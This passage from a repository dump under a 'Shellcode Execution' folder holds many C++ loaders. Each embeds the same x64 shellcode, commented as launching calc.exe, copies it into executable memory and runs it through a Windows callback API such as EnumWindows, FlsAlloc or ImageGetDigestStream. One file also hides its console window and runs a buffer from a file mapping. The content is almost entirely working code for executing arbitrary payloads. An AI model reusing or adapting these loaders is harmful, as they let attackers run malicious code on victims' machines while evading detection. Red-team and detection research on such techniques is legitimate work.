"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | 32 | int main() { 33 | 34 | 35 | LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | memcpy(address, &op[0], sizeof(op)); 37 | 38 | EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)address, LOCALE_NAME_SYSTEM_DEFAULT, TIME_NOSECONDS, NULL); 39 | 40 | return 0; 41 | 42 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumUILanguagesW/EnumUILanguagesW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | ::EnumUILanguagesW((UILANGUAGE_ENUMPROCW)address, MUI_LANGUAGE_ID, NULL); 36 | return 0; 37 | 38 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumUILanguagesW/EnumUILanguagesW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumWindowStationsW/EnumWindowStationsW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | 6 | // alfarom256 calc shellcode 7 | unsigned char op[] = 8 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 9 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 10 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 11 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 12 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 13 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 14 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 15 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 16 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 17 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 18 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 19 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 20 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 21 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 22 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 23 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 24 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 25 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 26 | "\x63\x2e\x65\x78\x65\x00"; 27 | 28 | 29 | 30 | int main() { 31 | 32 | 33 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 34 | ::RtlMoveMemory(addr, op, sizeof(op)); 35 | 36 | if (addr) { 37 | 38 | ::EnumWindowStationsW((WINSTAENUMPROCW)addr, NULL); 39 | 40 | } 41 | 42 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumWindowStationsW/EnumWindowStationsW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumWindows/EnumWindows.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int err(const char* errmsg) { 6 | 7 | 8 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 9 | return 1; 10 | 11 | } 12 | 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | 44 | ::EnumWindows((WNDENUMPROC)addr, NULL); 45 | 46 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumWindows/EnumWindows.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumerateLoadedModules/EnumerateLoadedModules.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Requires dbghelp.lib 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | int main() { 32 | 33 | 34 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | ::RtlMoveMemory(addr, op, sizeof(op)); 36 | ::EnumerateLoadedModules(::GetCurrentProcess(), (PENUMLOADED_MODULES_CALLBACK)addr, NULL); 37 | 38 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumerateLoadedModules/EnumerateLoadedModules.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/FiberContextEdit/FiberContextEdit.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/FileMap/directPointerToFileMap.cpp: -------------------------------------------------------------------------------- 1 | //Video URL: https://youtu.be/WYf_nPIPC4s 2 | #include 3 | #include 4 | 5 | unsigned char buf[] = ""; 6 | 7 | int main() 8 | { 9 | ShowWindow(GetConsoleWindow(), SW_HIDE); 10 | 11 | HANDLE mem_handle = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(buf), NULL); 12 | 13 | void* mem_map = MapViewOfFile(mem_handle, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0x0, 0x0, sizeof(buf)); 14 | 15 | std::memcpy(mem_map, buf, sizeof(buf)); 16 | 17 | std::cout << ((int(*)())mem_map)() << std::endl; 18 | } 19 | -------------------------------------------------------------------------------- /Shellcode Execution/FlsAlloc/FlsAlloc.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | int main() { 27 | 28 | HANDLE hProcess = ::GetCurrentProcess(); 29 | 30 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 31 | memcpy(address, &op[0], sizeof(op)); 32 | 33 | DWORD dIndex = ::FlsAlloc((PFLS_CALLBACK_FUNCTION)address); 34 | CONST CHAR* dummy = "dummy"; 35 | 36 | FlsSetValue(dIndex, &dummy); 37 | 38 | } -------------------------------------------------------------------------------- /Shellcode Execution/FlsAlloc/FlsAlloc.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/ImageGetDigestStream/ImageGetDigestStream.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Requires Imagehlp.lib 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | int main() { 32 | 33 | 34 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | ::RtlMoveMemory(addr, op, sizeof(op)); 36 | 37 | HANDLE hImg = ::CreateFileW(L"C:\\Windows\\System32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 38 | HANDLE dummy; 39 | 40 | if (hImg) { 41 | 42 | ::ImageGetDigestStream(hImg, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, (DIGEST_FUNCTION)addr, &dummy); 43 | ::CloseHandle(dummy); 44 | 45 | } 46 | 47 | ::CloseHandle(hImg); 48 | 49 | } -------------------------------------------------------------------------------- /Shellcode Execution/ImageGetDigestStream/ImageGetDigestStream.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/ImmEnumInputContext/ImmEnumInputContext.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "Imm32.lib") 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | 32 | int main() { 33 | 34 | 35 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | memcpy(address, &op[0], sizeof(op)); 37 | 38 | ::ImmEnumInputContext(NULL, (IMCENUMPROC)address, NULL); 39 | 40 | return 0; 41 | 42 | } -------------------------------------------------------------------------------- /Shellcode Execution/ImmEnumInputContext/ImmEnumInputContext.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/InitOnceExecuteOnce/InitOnceExecuteOnce.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc 